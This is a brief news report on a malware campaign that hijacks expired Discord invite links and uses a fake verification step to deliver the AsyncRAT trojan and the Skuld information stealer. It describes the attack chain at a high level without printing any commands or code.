A new malicious campaign is abusing a loophole in Discord’s invitation system to distribute malware, including the AsyncRAT remote access trojan and a modified variant of the Skuld information stealer, according to cybersecurity researchers at c.
The attackers hijacked expired or deleted vanity invite links on Discord, redirecting users from legitimate communities to malicious servers under their control.
Once inside the rogue server, users are prompted to complete a so-called ‘verification’ step. In reality, this is a phishing attempt using the ClickFix tactic. Victims are tricked into copying and running a malicious PowerShell command disguised as a verification process. The command initiates a stealthy infection chain, eventually delivering AsyncRAT and the Skuld Stealer.
AsyncRAT enables full remote control over an infected device and uses a technique called a ‘dead drop resolver’ to connect to its command-and-control (C2) server via Pastebin. Meanwhile, Golang-based Skuld harvests sensitive data from browsers, Discord, gaming platforms, and crypto wallets such as Exodus and Atomic. It even replaces legitimate app files with trojanized versions downloaded from GitHub using the wallet injection technique.
The campaign’s infrastructure leverages trusted cloud services like GitHub, Pastebin, Bitbucket, and Discord itself, allowing it to evade traditional security detection.
Discord has since disabled the malicious bot, disrupting the attack chain. However, Check Point also discovered a parallel operation by the same threat actor involving a fake game hacktool, which was downloaded over 350 times, that delivers the same loader.
Victims appear to be largely located in the US, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the UK.